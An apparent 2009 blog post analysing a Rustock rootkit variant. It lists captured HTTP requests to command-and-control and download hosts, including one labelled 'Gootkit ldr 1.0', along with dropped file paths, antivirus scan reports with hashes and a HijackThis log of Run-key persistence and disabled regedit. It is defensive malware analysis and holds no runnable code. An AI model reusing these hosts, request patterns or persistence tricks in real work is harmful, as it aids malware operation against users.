Rustock is back again more active than ever!

Recently Steve received some new .EXE files classified as Rootkit.Rustock and we have analyzed one file to see if the beast Rustock is still active. The bad thing is that the results of this analysis reveal that the spam activity of Rustock is yet highly active

During the analysis we noticed that the malware used a particular string for the User Agent for communicate with a specific domain: Gootkit ldr 1.0 … is this a new name for a new Malware Kit ???

The .EXE file after its execution, injected code into services.exe and then started to send various GET queries to a specific domain:

1
195.2.253.246 (catjepzcft.com)

Network traffic:

1
2
3
4
5
6
7
8
9
10
11
GET /progs/ptpqq/pmzznaann.php?adv=advxxx HTTP/1.1
Host: catjepzcft.com
 
GET /progs/ptpqq/mmjjwjxt.php HTTP/1.1
Host: catjepzcft.com
 
GET /progs/ptpqq/ebbxlllly.php HTTP/1.1
Host: catjepzcft.com
 
GET /progs/ptpqq/spcmmzmnak.php HTTP/1.1
Host: catjepzcft.com

All of the above *.php files redirect to PE (Portable Executable) files that are all downloaded in TEMP folder and are then executed hidden.

Rustock spam bots have C&C (Command and Control) domain names that are hardcoded inside the malware code, this technique allows the bot’s authors to change the controlled hosts dinamycally. This Rustock variant has started various requests with these domains:

1
2
3
yopilazankaza.net
grezasadaf.info
mail.grezasadaf.info

After, we noticed the malware sent some encrypted traffic to this IP:

1
74.52.83.83 (user.happyhost.org)

We can see from the traffic below that the malware sent some info to the malicious domain, and our Hardware ID to identify our computer:

1
2
GET /progs/ptpqq/pmmmaana.php?adv=advxxx&code1=LSI0&code2=0809&id=-[HD_ID]&p=1 HTTP/1.1
Host: catjepzcft.com

Next, it started traffic with another domain:

1
2
3
ctfmon.info
110.60.233.72.static.reverse.ltdomains.com
72.233.60.110

Network traffic:

1
2
GET /cd/cd.php?id=5V9B6019C6A1FA0&ver=nz0 HTTP/1.1
Host: ctfmon.info

And at this point, the malware started to send data to a new IP:

1
92.62.101.27 (ds27.esthost.eu)

Network traffic:

1
2
3
GET /d3n2829230.dat HTTP/1.0
User-Agent: Gootkit ldr 1.0
Host: 92.62.101.27:5191

Note how is named the User Agent: Gootkit ldr 1.0.
It may be the name of a NEW malware kit and ldr should stand for loader.

New traffic:

1
2
3
4
5
GET /xxxxxxxxxxxxx HTTP/1.1
Host: damqrgldev.net
 
GET /xxxxxxxxxxxxx HTTP/1.1
Host: damqrgldev.net

The malware downloaded various malicious files (again) in TEMP Folder, and executed all of them… At this point, the malware started to send a lot of encrypted data to a domain (previously named):

1
92.62.101.27 (ds27.esthost.eu)

Network traffic:

Packets : 505
Data Size : 329.768 Bytes
Total Size : 350.040 Bytes

And now started a heavy SPAM activity… the malware started to send various domain requests to a lot of email servers:

Screenshot

And then the spambot started to send a high amount of spam messages… the SPAM campaign is now more active than ever!!!

Screenshot

Now lets see what files were created by this Rustock variant:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
C:\WINDOWS\system32\drivers\50cb8405.sys => DRIVER OF THE ROOTKIT
C:\mtoaphpo.exe
C:\lcrywx.exe
C:\shcu.exe
C:\1630016.bat
C:\paohiqlm.exe
C:\-[HARDWARE_ID]
C:\WINDOWS\system32\drivers\lmo08ed.sys => ANOTHER DRIVER OF THE ROOTKIT
C:\DOCUME~1\user\LOCALS~1\Temp\2081034192.exe
C:\DOCUME~1\user\LOCALS~1\Temp\2092050032.exe
C:\hhfls.exe
C:\WINDOWS\system32\dllcache\svchost.exe.new
C:\ntgxbfmx.exe
C:\DOCUME~1\user\LOCALS~1\Temp\h531l.exe
C:\adwitwxa.exe
C:\zmuvmq.bat
C:\xuulbic.exe
C:\WINDOWS\system32\crypts.dll
C:\DOCUME~1\user\LOCALS~1\Temp\csrssc.exe
C:\DOCUME~1\user\LOCALS~1\Temp\rip10.exe
C:\DOCUME~1\user\LOCALS~1\Temp\2.exe
C:\DOCUME~1\user\LOCALS~1\Temp\7hjhffd.bat
C:\Program Files\Common Files\imlhy.dll
C:\DOCUME~1\user\LOCALS~1\Temp\g5i8nvt30.exe
C:\DOCUME~1\user\LOCALS~1\Temp\zbqy6cseo.exe
C:\DOCUME~1\user\LOCALS~1\Temp\yb2dpk.exe
C:\DOCUME~1\user\LOCALS~1\Temp\ksjx1r.exe
C:\DOCUME~1\user\LOCALS~1\Temp\y62pk.exe
C:\DOCUME~1\user\LOCALS~1\Temp\phl7u.exe
C:\DOCUME~1\user\LOCALS~1\Temp\x4l7wf4x.exe
C:\DOCUME~1\user\LOCALS~1\Temp\acs2reslt4.exe

Below there are the virus scanner reports of the two rootkit drivers:

Report Generated: 16.3.2009 at 0.25.01 (GMT 1)
File Name: 50cb8405.sys
File Size: 101 KB
MD5 Hash: 3B51541EB5EAE7342A191EF17C8B3D60
SHA1 Hash: 70A7C283EE4DFCE6AF490FB256FF944185238C20
Detection Rate: 3 on 24 (12,5 %)
Status: INFECTED

Antivirus Sig version Engine Version Result
a-squared 15/03/2009 4.0.0.32 –
Avira AntiVir 7.1.2.171 8.1.2.12 TR/Rootkit.Gen
Avast 090314-0 4.8.1229 –
AVG 270.11.15/2003 8.0.0.0 –
BitDefender 16/03/2009 7.0.0.2555 Backdoor.Rustock.NFE
ClamAV 15/03/2009 0.93.1.0 –
Comodo 1057 3.8 –
Dr.Web 16/03/2009 5.0 –
Ewido 16/03/2009 4.0.0.2 –
F-PROT 6 20090315 4.4.4.56 –
G DATA 19.3655 2.0.7309.847 –
IkarusT3 14/03/2009 1001044 –
Kaspersky 16/03/2009 8.0.0.357 –
McAfee 15/03/2009 5.1.0.0 –
Malware Hash Registry 16/03/2009 N/A –
NOD32 v3 3937 3.0.677 –
Norman 2009/03/13 5.92.08 –
Panda 07/02/2009 9.5.1.00 –
QuickHeal 14 March, 2009 10.0 –
Solo Antivirus 16/03/2009 8.0 –
Sophos 16/03/2009 4.32.0 –
TrendMicro 895(589500) 1.1-1001 –
VBA32 16/03/2009 3.12.0.300 Malware-Cryptor.Win32.General.3
VirusBuster 10.102.11 1.4.3 –

Report Generated: 16.3.2009 at 0.26.02 (GMT 1)
File Name: lmo08ed.sys
File Size: 21 KB
MD5 Hash: 1614229CC85D2F0DA1668BEC2AA2966E
SHA1 Hash: F2347ABAD8541540040D69DF6EC7F9104B998C74
Detection Rate: 1 on 24 (4,16 %)
Status: INFECTED

Antivirus Sig version Engine Version Result
a-squared 15/03/2009 4.0.0.32 –
Avira AntiVir 7.1.2.171 8.1.2.12 –
Avast 090314-0 4.8.1229 –
AVG 270.11.15/2003 8.0.0.0 –
BitDefender 16/03/2009 7.0.0.2555 –
ClamAV 15/03/2009 0.93.1.0 –
Comodo 1057 3.8 –
Dr.Web 16/03/2009 5.0 –
Ewido 16/03/2009 4.0.0.2 –
F-PROT 6 20090315 4.4.4.56 –
G DATA 19.3655 2.0.7309.847 –
IkarusT3 14/03/2009 1001044 –
Kaspersky 16/03/2009 8.0.0.357 –
McAfee 15/03/2009 5.1.0.0 –
Malware Hash Registry 16/03/2009 N/A –
NOD32 v3 3937 3.0.677 –
Norman 2009/03/13 5.92.08 Trojan W32/Rootkit.AJUT
Panda 07/02/2009 9.5.1.00 –
QuickHeal 14 March, 2009 10.0 –
Solo Antivirus 16/03/2009 8.0 –
Sophos 16/03/2009 4.32.0 –
TrendMicro 895(589500) 1.1-1001 –
VBA32 16/03/2009 3.12.0.300 –
VirusBuster 10.102.11 1.4.3 –

The rootkit installs always the 3 (famous) SSDT hooks and this time we can see that it hides also its driver:

Screenshot

Hidden Driver:

Screenshot

Stealth Code:

Screenshot

Kernel Modifications:

Screenshot

And below, there is an HijackThis log:

Running processes:
C:\DOCUME~1\user\LOCALS~1\Temp\csrssc.exe
C:\DOCUME~1\user\LOCALS~1\Temp\ig2wf5bum4.exe
C:\DOCUME~1\user\LOCALS~1\Temp\i10ftqrh0.exe

O4 – HKLM\..\Run: [xsigsud7qw7f8rwrt8] C:\DOCUME~1\user\LOCALS~1\Temp\h531l.exe
O4 – HKLM\..\Run: [y0agaspmnmxkw4djb3as16eeuar] C:\DOCUME~1\user\LOCALS~1\Temp\g5i8nvt30.exe
O4 – HKLM\..\Run: [t50zoy0kqddd9qjam7lfo] C:\DOCUME~1\user\LOCALS~1\Temp\f35avpt2j.exe
O4 – HKLM\..\Run: [krae4io3anewkh6n1c32] C:\DOCUME~1\user\LOCALS~1\Temp\go82c4irn.exe
O4 – HKLM\..\Run: [i3ommwe1iq63eplz1l5shm39kd3nr] C:\DOCUME~1\user\LOCALS~1\Temp\ldav9bgf.exe
O4 – HKLM\..\Run: [wlad2loiah66phy9e] C:\DOCUME~1\user\LOCALS~1\Temp\s7rg8a.exe
O4 – HKLM\..\Run: [kq005y3gtd5grvxemgyp77puvoxeh] C:\DOCUME~1\user\LOCALS~1\Temp\ceu9gzw17.exe
O4 – HKLM\..\Run: [y2l3ad3xmfd99c18hrirbgvnztg] C:\DOCUME~1\user\LOCALS~1\Temp\zbqy6cseo.exe
O4 – HKLM\..\Run: [ejk9b1onvd75gfmvp2j] C:\DOCUME~1\user\LOCALS~1\Temp\yb2dpk.exe
O4 – HKLM\..\Run: [bicya6fq4l8rm17m0e3tk] C:\DOCUME~1\user\LOCALS~1\Temp\rh1lty.exe
O4 – HKLM\..\Run: [aotn8li6zj2a9a3pd5nk7y] C:\DOCUME~1\user\LOCALS~1\Temp\p27p2.exe
O4 – HKLM\..\Run: [x4veff6kyajo16mhq18ujw8vj3dpa] C:\DOCUME~1\user\LOCALS~1\Temp\ksjx1r.exe
O4 – HKLM\..\Run: [omxf835aubqqpxvzfdvre094g2m0m] C:\DOCUME~1\user\LOCALS~1\Temp\y62pk.exe
O4 – HKLM\..\Run: [eo8in0uixmmd988l5dtstn0gju] C:\DOCUME~1\user\LOCALS~1\Temp\phl7u.exe
O4 – HKLM\..\Run: [e9vetnuspuff604s9iu4bpt] C:\DOCUME~1\user\LOCALS~1\Temp\x4l7wf4x.exe
O4 – HKLM\..\Run: [urg2avbreylonz] C:\DOCUME~1\user\LOCALS~1\Temp\acs2reslt4.exe
O4 – HKCU\..\Run: [nuj56tlag39hly] C:\DOCUME~1\user\LOCALS~1\Temp\d2q8qn.exe
O4 – HKCU\..\Run: [xjtsi4b3oq3] C:\DOCUME~1\user\LOCALS~1\Temp\pyphk.exe
O4 – HKCU\..\Run: [qcsn79k6rirjgr] C:\DOCUME~1\user\LOCALS~1\Temp\l2jna51.exe
O4 – HKCU\..\Run: [oso3bevvdmzr1] C:\DOCUME~1\user\LOCALS~1\Temp\bvtrncc.exe
O4 – HKCU\..\Run: [ubvttqcqfdt7yxo4gt9opxraitvp] C:\DOCUME~1\user\LOCALS~1\Temp\ig2wf5bum4.exe
O4 – HKCU\..\Run: [qiojoeqys7e1f4kgazo4eycu8] C:\DOCUME~1\user\LOCALS~1\Temp\i10ftqrh0.exe
O7 – HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1
O20 – Winlogon Notify: crypt – C:\WINDOWS\SYSTEM32\crypts.dll

The malware disabled also the regedit.exe, as we can see from this value the malware changed the DWORD of the value named DisableRegedit to 1:

O7 – HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1

Random Posts

Previous Posts